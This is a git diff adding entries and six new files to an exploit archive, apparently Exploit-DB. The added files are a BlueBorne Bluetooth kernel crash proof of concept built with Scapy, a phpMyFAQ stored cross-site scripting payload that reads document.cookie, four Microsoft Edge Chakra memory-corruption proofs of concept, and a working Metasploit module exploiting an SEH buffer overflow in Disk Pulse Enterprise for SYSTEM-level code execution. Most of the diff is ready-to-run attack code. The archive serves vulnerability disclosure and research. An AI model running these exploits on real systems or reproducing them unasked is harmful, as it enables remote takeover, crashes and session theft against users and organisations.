diff --git a/files.csv b/files.csv
index 93713f778..0e8c0389d 100644
--- a/files.csv
+++ b/files.csv
@@ -5680,6 +5680,11 @@ id,file,description,date,author,platform,type,port
 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0
 42759,platforms/windows/dos/42759.html,"Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read",2017-09-19,"Google Security Research",windows,dos,0
+42762,platforms/linux/dos/42762.txt,"Linux Kernel <= 4.13.1 - BlueTooth Buffer Overflow (PoC)",2017-09-21,"Marcin Kozlowski",linux,dos,0
+42763,platforms/windows/dos/42763.html,"Microsoft Edge - Chakra Incorrectly Parses Object Patterns",2017-09-21,"Google Security Research",windows,dos,0
+42764,platforms/windows/dos/42764.html,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes",2017-09-21,"Google Security Research",windows,dos,0
+42765,platforms/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'",2017-09-21,"Google Security Research",windows,dos,0
+42766,platforms/windows/dos/42766.html,"Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses",2017-09-21,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15842,6 +15847,7 @@ id,file,description,date,author,platform,type,port
 42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69
 42726,platforms/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",hardware,remote,0
 42753,platforms/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor",2017-05-19,"Simon Brannstrom",multiple,remote,0
+42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38537,3 +38543,4 @@ id,file,description,date,author,platform,type,port
 42752,platforms/php/webapps/42752.txt,"iTech Gigs Script 1.20 - 'cat' Parameter SQL Injection",2017-09-15,8bitsec,php,webapps,0
 42754,platforms/php/webapps/42754.txt,"Tecnovision DLX Spot - Authentication Bypass",2017-05-19,"Simon Brannstrom",php,webapps,0
 42755,platforms/php/webapps/42755.txt,"Tecnovision DLX Spot - Arbitrary File Upload",2017-05-19,"Simon Brannstrom",php,webapps,0
+42761,platforms/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting",2017-09-21,"Ishaq Mohammed",php,webapps,0
diff --git a/platforms/linux/dos/42762.txt b/platforms/linux/dos/42762.txt
new file mode 100755
index 000000000..0a5eb101c
--- /dev/null
+++ b/platforms/linux/dos/42762.txt
@@ -0,0 +1,297 @@
+# Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized -
+DoS (Crash) only
+# Date: 09/21/2017
+# Exploit Author: Marcin Kozlowski <marcinguy@gmail.com>
+# Version: Kernel version v3.3-rc1, and thus affects all version from there on
+# Tested on: Linux 4.4.0-93-generic #116
+# CVE : CVE-2017-1000251
+
+# Provided for legal security research and testing purposes ONLY.
+
+
+
+Proof of Concept - Crash Only - Unarmed/Unweaponized/No Payload
+
+After reading tons of Documentation and Protocol specifications.
+
+
+1) Install Scapy
+
+https://github.com/secdev/scapy
+
+
+Add/Replace these requests and responses in Bluetooth Protocol stack to these:
+
+
+scapy/layers/bluetooth.py
+
+class L2CAP_ConfReq(Packet):
+    name = "L2CAP Conf Req"
+    fields_desc = [ LEShortField("dcid",0),
+                    LEShortField("flags",0),
+                    ByteField("type",0),
+                    ByteField("length",0),
+                    ByteField("identifier",0),
+                    ByteField("servicetype",0),
+                    LEShortField("sdusize",0),
+                    LEIntField("sduarrtime",0),
+                    LEIntField("accesslat",0),
+                    LEIntField("flushtime",0),
+                    ]
+
+
+
+class L2CAP_ConfResp(Packet):
+    name = "L2CAP Conf Resp"
+    fields_desc = [ LEShortField("scid",0),
+                    LEShortField("flags",0),
+                    LEShortField("result",0),
+                    ByteField("type0",0),
+                    ByteField("length0",0),
+                    LEShortField("option0",0),
+                    ByteField("type1",0),
+                    ByteField("length1",0),
+                    LEShortField("option1",0),
+                    ByteField("type2",0),
+                    ByteField("length2",0),
+                    LEShortField("option2",0),
+                    ByteField("type3",0),
+                    ByteField("length3",0),
+                    LEShortField("option3",0),
+                    ByteField("type4",0),
+                    ByteField("length4",0),
+                    LEShortField("option4",0),
+                    ByteField("type5",0),
+                    ByteField("length5",0),
+                    LEShortField("option5",0),
+                    ByteField("type6",0),
+                    ByteField("length6",0),
+                    LEShortField("option6",0),
+                    ByteField("type7",0),
+                    ByteField("length7",0),
+                    LEShortField("option7",0),
+                    ByteField("type8",0),
+                    ByteField("length8",0),
+                    LEShortField("option8",0),
+                    ByteField("type9",0),
+                    ByteField("length9",0),
+                    LEShortField("option9",0),
+                    ByteField("type10",0),
+                    ByteField("length10",0),
+                    LEShortField("option10",0),
+                    ByteField("type11",0),
+                    ByteField("length11",0),
+                    LEShortField("option11",0),
+                    ByteField("type12",0),
+                    ByteField("length12",0),
+                    LEShortField("option12",0),
+                    ByteField("type13",0),
+                    ByteField("length13",0),
+                    LEShortField("option13",0),
+                    ByteField("type14",0),
+                    ByteField("length14",0),
+                    LEShortField("option14",0),
+                    ByteField("type15",0),
+                    ByteField("length15",0),
+                    LEShortField("option15",0),
+                    ByteField("type16",0),
+                    ByteField("length16",0),
+                    LEShortField("option16",0),
+                    ByteField("type17",0),
+                    ByteField("length17",0),
+                    LEShortField("option17",0),
+                    ByteField("type18",0),
+                    ByteField("length18",0),
+                    LEShortField("option18",0),
+                    ByteField("type19",0),
+                    ByteField("length19",0),
+                    LEShortField("option19",0),
+                    ByteField("type20",0),
+                    ByteField("length20",0),
+                    LEShortField("option20",0),
+                    ByteField("type21",0),
+                    ByteField("length21",0),
+                    LEShortField("option21",0),
+                    ByteField("type22",0),
+                    ByteField("length22",0),
+                    LEShortField("option22",0),
+                    ByteField("type23",0),
+                    ByteField("length23",0),
+                    LEShortField("option23",0),
+                    ByteField("type24",0),
+                    ByteField("length24",0),
+                    LEShortField("option24",0),
+                    ByteField("type25",0),
+                    ByteField("length25",0),
+                    LEShortField("option25",0),
+                    ByteField("type26",0),
+                    ByteField("length26",0),
+                    LEShortField("option26",0),
+                    ByteField("type27",0),
+                    ByteField("length27",0),
+                    LEShortField("option27",0),
+                    ByteField("type28",0),
+                    ByteField("length28",0),
+                    LEShortField("option28",0),
+                    ByteField("type29",0),
+                    ByteField("length29",0),
+                    LEShortField("option29",0),
+                    ByteField("type30",0),
+                    ByteField("length30",0),
+                    LEShortField("option30",0),
+                    ByteField("type31",0),
+                    ByteField("length31",0),
+                    LEShortField("option31",0),
+                    ByteField("type32",0),
+                    ByteField("length32",0),
+                    LEShortField("option32",0),
+                    ByteField("type33",0),
+                    ByteField("length33",0),
+                    LEShortField("option33",0),
+                    ByteField("type34",0),
+                    ByteField("length34",0),
+                    LEShortField("option34",0),
+                    ByteField("type35",0),
+                    ByteField("length35",0),
+                    LEShortField("option35",0),
+                    ByteField("type36",0),
+                    ByteField("length36",0),
+                    LEShortField("option36",0),
+                    ByteField("type37",0),
+                    ByteField("length37",0),
+                    LEShortField("option37",0),
+                    ByteField("type38",0),
+                    ByteField("length38",0),
+                    LEShortField("option38",0),
+                    ByteField("type39",0),
+                    ByteField("length39",0),
+                    LEShortField("option39",0),
+                    ByteField("type40",0),
+                    ByteField("length40",0),
+                    LEShortField("option40",0),
+                    ByteField("type41",0),
+                    ByteField("length41",0),
+                    LEShortField("option41",0),
+                    ByteField("type42",0),
+                    ByteField("length42",0),
+                    LEShortField("option42",0),
+                    ByteField("type43",0),
+                    ByteField("length43",0),
+                    LEShortField("option43",0),
+                    ByteField("type44",0),
+                    ByteField("length44",0),
+                    LEShortField("option44",0),
+                    ByteField("type45",0),
+                    ByteField("length45",0),
+                    LEShortField("option45",0),
+                    ByteField("type46",0),
+                    ByteField("length46",0),
+                    LEShortField("option46",0),
+                    ByteField("type47",0),
+                    ByteField("length47",0),
+                    LEShortField("option47",0),
+                    ByteField("type48",0),
+                    ByteField("length48",0),
+                    LEShortField("option48",0),
+                    ByteField("type49",0),
+                    ByteField("length49",0),
+                    LEShortField("option49",0),
+                    ByteField("type50",0),
+                    ByteField("length50",0),
+                    LEShortField("option50",0),
+                    ByteField("type51",0),
+                    ByteField("length51",0),
+                    LEShortField("option51",0),
+                    ByteField("type52",0),
+                    ByteField("length52",0),
+                    LEShortField("option52",0),
+                    ByteField("type53",0),
+                    ByteField("length53",0),
+                    LEShortField("option53",0),
+                    ByteField("type54",0),
+                    ByteField("length54",0),
+                    LEShortField("option54",0),
+                    ByteField("type55",0),
+                    ByteField("length55",0),
+                    LEShortField("option55",0),
+                    ByteField("type56",0),
+                    ByteField("length56",0),
+                    LEShortField("option56",0),
+                    ByteField("type57",0),
+                    ByteField("length57",0),
+                    LEShortField("option57",0),
+                    ByteField("type58",0),
+                    ByteField("length58",0),
+                    LEShortField("option58",0),
+                    ByteField("type59",0),
+                    ByteField("length59",0),
+                    LEShortField("option59",0),
+                    ByteField("type60",0),
+                    ByteField("length60",0),
+                    LEShortField("option60",0),
+                    ByteField("type61",0),
+                    ByteField("length61",0),
+                    LEShortField("option61",0),
+                    ByteField("type62",0),
+                    ByteField("length62",0),
+                    LEShortField("option62",0),
+                    ByteField("type63",0),
+                    ByteField("length63",0),
+                    LEShortField("option63",0),
+                    ByteField("type64",0),
+                    ByteField("length64",0),
+                    LEShortField("option64",0),
+                    ByteField("type65",0),
+                    ByteField("length65",0),
+                    LEShortField("option65",0),
+                    ByteField("type66",0),
+                    ByteField("length66",0),
+                    LEShortField("option66",0),
+                    ByteField("type67",0),
+                    ByteField("length67",0),
+                    LEShortField("option67",0),
+                    ByteField("type68",0),
+                    ByteField("length68",0),
+                    LEShortField("option68",0),
+                    ByteField("type69",0),
+                    ByteField("length69",0),
+                    LEShortField("option69",0),
+                    ]
+
+
+2) Exploit
+
+
+bluebornexploit.py
+------------------------
+
+from scapy.all import *
+
+pkt = L2CAP_CmdHdr(code=4)/
+L2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff)
+
+
+pkt1 = L2CAP_CmdHdr(code=5)/
+L2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,length37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000)
+
+
+bt = BluetoothL2CAPSocket("00:1A:7D:DA:71:13")
+
+bt.send(pkt)
+bt.send(pkt1)
+
+
+bluetoothsrv.py
+--------------------
+
+from scapy.all import *
+
+bt = BluetoothL2CAPSocket("01:02:03:04:05:06")
+
+bt.recv()
+
+
+
+
+DEMO:
+https://imgur.com/a/zcvLb
diff --git a/platforms/php/webapps/42761.txt b/platforms/php/webapps/42761.txt
new file mode 100755
index 000000000..af517c350
--- /dev/null
+++ b/platforms/php/webapps/42761.txt
@@ -0,0 +1,38 @@
+# Exploit Title: phpMyFAQ 2.9.8 Stored XSS
+# Vendor Homepage: http://www.phpmyfaq.de/
+# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
+# Exploit Author: Ishaq Mohammed
+# Contact: https://twitter.com/security_prince
+# Website: https://about.me/security-prince
+# Category: webapps
+# CVE: CVE-2017-14618
+
+1. Description
+
+Cross-site scripting (XSS) vulnerability in inc/PMF/Faq.php in phpMyFAQ
+through 2.9.8 allows remote attackers to inject arbitrary web script or
+HTML via the Questions field in an "Add New FAQ" action.
+
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14618
+
+2. Proof of Concept
+
+Steps to Reproduce:
+
+   1. Open the affected link "
+   http://localhost/phpmyfaq/admin/?action=editentry" with logged in user
+   with administrator privileges
+   2. Enter the <a onmouseover=alert(document.cookie)>xss link</a> in the
+   “Questions”
+   3. Save the FAQ
+   4. Login using any other user or simply click on the phpMyFAQ on the
+   top-right hand side of the web portal
+   5. Click on the latest FAQ added
+   6. Hover around the name "xss link"
+
+
+3. Solution:
+
+The issue is now patched by the vendor
+https://github.com/thorsten/phpMyFAQ/commit/30b0025e19bd95ba28f4eff4d259671e7bb6bb86
+
diff --git a/platforms/windows/dos/42763.html b/platforms/windows/dos/42763.html
new file mode 100755
index 000000000..769bcba3a
--- /dev/null
+++ b/platforms/windows/dos/42763.html
@@ -0,0 +1,22 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1308
+
+When the Chakra's parser meets "{", at first, Chakra treats it as an object literal without distinguishing whether it will be an object literal(i.e., {a: 0x1234}) or an object pattern(i.e., {a} = {a: 1234}). After finishing to parse it using "Parser::ParseTerm", if it's an object pattern, Chakra converts it to an object pattern using the "ConvertObjectToObjectPattern" method.
+
+The problem is that "Parser::ParseTerm" also parses ".", etc. using "ParsePostfixOperators" without proper checks. As a result, an invalid syntax(i.e., {b = 0x1111...}.c) can be parsed and "ConvertObjectToObjectPattern" will fail to convert it to an object pattern.
+
+In the following PoC, "ConvertObjectToObjectPattern" skips "{b = 0x1111...}.c". So the object literal will have incorrect members(b = 0x1111, c = 0x2222), this leads to type confusion(Chakra will think "c" is a setter and try to call it).
+
+PoC:
+-->
+
+function f() {
+    ({
+        a: {
+            b = 0x1111,
+            c = 0x2222,
+        }.c = 0x3333
+    } = {});
+}
+
+f();
diff --git a/platforms/windows/dos/42764.html b/platforms/windows/dos/42764.html
new file mode 100755
index 000000000..f8c35b72a
--- /dev/null
+++ b/platforms/windows/dos/42764.html
@@ -0,0 +1,85 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1310
+
+(function f(a = (function () {
+    print(a);
+    with ({});
+})()) {
+    function g() {
+        f;
+    }
+})();
+
+When Chakra executes the above code, it doesn't generate bytecode for "g". This is a feature called "DeferParse". The problem is that the bytecode generated for "f" when the feature is enabled is different to the bytecode generated when the feature is disabled. This is because of "ByteCodeGenerator::ProcessScopeWithCapturedSym" which changes the function expression scope's type is not called when the feature is enabled.
+
+Here's a snippet of the method which emits an incorrect opcode.
+void ByteCodeGenerator::LoadAllConstants(FuncInfo *funcInfo)
+{
+    ...
+    if (funcExprWithName)
+    {
+        if (funcInfo->GetFuncExprNameReference() ||
+            (funcInfo->funcExprScope && funcInfo->funcExprScope->GetIsObject()))
+        {
+            ...
+            Js::RegSlot ldFuncExprDst = sym->GetLocation();
+            this->m_writer.Reg1(Js::OpCode::LdFuncExpr, ldFuncExprDst);
+
+            if (sym->IsInSlot(funcInfo))
+            {
+                Js::RegSlot scopeLocation;
+                AnalysisAssert(funcInfo->funcExprScope);
+
+                if (funcInfo->funcExprScope->GetIsObject())
+                {
+                    scopeLocation = funcInfo->funcExprScope->GetLocation();
+                    this->m_writer.Property(Js::OpCode::StFuncExpr, sym->GetLocation(), scopeLocation,
+                        funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));
+                }
+                else if (funcInfo->bodyScope->GetIsObject())
+                {
+                    this->m_writer.ElementU(Js::OpCode::StLocalFuncExpr, sym->GetLocation(),
+                        funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));
+                }
+                else
+                {
+                    Assert(sym->HasScopeSlot());
+                    this->m_writer.SlotI1(Js::OpCode::StLocalSlot, sym->GetLocation(),
+                                          sym->GetScopeSlot() + Js::ScopeSlots::FirstSlotIndex);
+                }
+            }
+            ...
+        }
+    }
+    ...
+}
+
+As you can see, it only handles "funcExprScope->GetIsObject()" or "bodyScope->GetIsObject()" but not "paramScope->GetIsObject()".
+Without the feature, there's no case that only "paramScope->GetIsObject()" returns true because "ByteCodeGenerator::ProcessScopeWithCapturedSym" for "f" is always called and makes "funcInfo->funcExprScope->GetIsObject()" return true.
+But with the feature, the method is not called. So it ends up emitting an incorrect opcode "Js::OpCode::StLocalSlot".
+
+The feature is enabled in Edge by default.
+
+PoC:
+-->
+
+let h = function f(a0 = (function () {
+    a0;
+    a1;
+    a2;
+    a3;
+    a4;
+    a5;
+    a6;
+    a7 = 0x99999;  // oob write
+
+    with ({});
+})(), a1, a2, a3, a4, a5, a6, a7) {
+    function g() {
+        f;
+    }
+};
+
+for (let i = 0; i < 0x10000; i++) {
+    h();
+}
diff --git a/platforms/windows/dos/42765.html b/platforms/windows/dos/42765.html
new file mode 100755
index 000000000..5d77290d4
--- /dev/null
+++ b/platforms/windows/dos/42765.html
@@ -0,0 +1,36 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1326
+
+In Javascript, the code executed by a direct call to eval shares the caller block's scopes. Chakra handles this from the parser. And there's a bug when it parses "eval" in a catch statement's param.
+
+ParseNodePtr Parser::ParseCatch()
+{
+    ...
+        pnodeCatchScope = StartParseBlock<buildAST>(PnodeBlockType::Regular, isPattern ? ScopeType_CatchParamPattern : ScopeType_Catch);
+        ...
+        ParseNodePtr pnodePattern = ParseDestructuredLiteral<buildAST>(tkLET, true /*isDecl*/, true /*topLevel*/, DIC_ForceErrorOnInitializer);
+    ...
+}
+
+1. "pnodeCatchScope" is a temporary block used to create a scope, and it is not actually inserted into the AST.
+2. If the parser meets "eval" in "ParseDestructuredLiteral", it calls "pnodeCatchScope->SetCallsEval".
+3. But "pnodeCatchScope" is not inserted into the AST. So the bytecode generator doesn't know it calls "eval", and it can't create scopes properly.
+
+PoC:
+-->
+
+function f() {
+    {
+        let i;
+        function g() {
+            i;
+        }
+
+        try {
+            throw 1;
+        } catch ({e = eval('dd')}) {
+        }
+    }
+}
+
+f();
\ No newline at end of file
diff --git a/platforms/windows/dos/42766.html b/platforms/windows/dos/42766.html
new file mode 100755
index 000000000..9bb969a6d
--- /dev/null
+++ b/platforms/windows/dos/42766.html
@@ -0,0 +1,47 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1327
+
+Here's the method used to re-parse asmjs modules.
+void JavascriptFunction::ReparseAsmJsModule(ScriptFunction** functionRef)
+{
+    ParseableFunctionInfo* functionInfo = (*functionRef)->GetParseableFunctionInfo();
+    Assert(functionInfo);
+    functionInfo->GetFunctionBody()->AddDeferParseAttribute();
+    functionInfo->GetFunctionBody()->ResetEntryPoint();
+    functionInfo->GetFunctionBody()->ResetInParams();
+
+    FunctionBody * funcBody = functionInfo->Parse(functionRef);
+
+#if ENABLE_PROFILE_INFO
+    // This is the first call to the function, ensure dynamic profile info
+    funcBody->EnsureDynamicProfileInfo();
+#endif
+
+    (*functionRef)->UpdateUndeferredBody(funcBody);
+}
+
+First, it resets the function body and then re-parses it. But it doesn't consider that "functionInfo->Parse(functionRef);" may throw an exception. So in the case, the function body remains reseted(invalid).
+
+We can make it throw an exception simply by exhausting the stack. 
+
+PoC:
+-->
+
+function Module() {
+    'use asm';
+
+    function f() {
+    }
+
+    return f;
+}
+
+function recur() {
+    try {
+        recur();
+    } catch (e) {
+        Module(1);
+    }
+}
+
+recur();
\ No newline at end of file
diff --git a/platforms/windows/remote/42767.rb b/platforms/windows/remote/42767.rb
new file mode 100755
index 000000000..462b9ea7e
--- /dev/null
+++ b/platforms/windows/remote/42767.rb
@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Disk Pulse Enterprise GET Buffer Overflow',
+      'Description'    => %q(
+        This module exploits an SEH buffer overflow in Disk Pulse Enterprise
+        9.9.16. If a malicious user sends a crafted HTTP GET request
+        it is possible to execute a payload that would run under the Windows
+        NT AUTHORITY\SYSTEM account.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Chance Johnson', # msf module - albatross@loftwing.net
+          'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '42560' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'EncoderType' => "alpha_mixed",
+          'BadChars' => "\x00\x0a\x0d\x26"
+        },
+      'Targets'        =>
+        [
+          [ 'Disk Pulse Enterprise 9.9.16',
+            {
+              'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll
+              'Offset' => 2492
+            }]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Aug 25 2017',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(80)])
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'    =>  '/',
+      'method' =>  'GET'
+    )
+
+    if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    connect
+
+    print_status("Generating exploit...")
+    exp = payload.encoded
+    exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
+    exp << generate_seh_record(target.ret)
+    exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode
+    exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
+    exp << 'B' * (5000 - exp.length) # padding
+
+    print_status("Sending exploit...")
+
+    send_request_cgi(
+      'uri' =>  '/../' + exp,
+      'method' =>  'GET',
+      'host' =>  '4.2.2.2',
+      'connection' =>  'keep-alive'
+    )
+
+    handler
+    disconnect
+  end
+end
\ No newline at end of file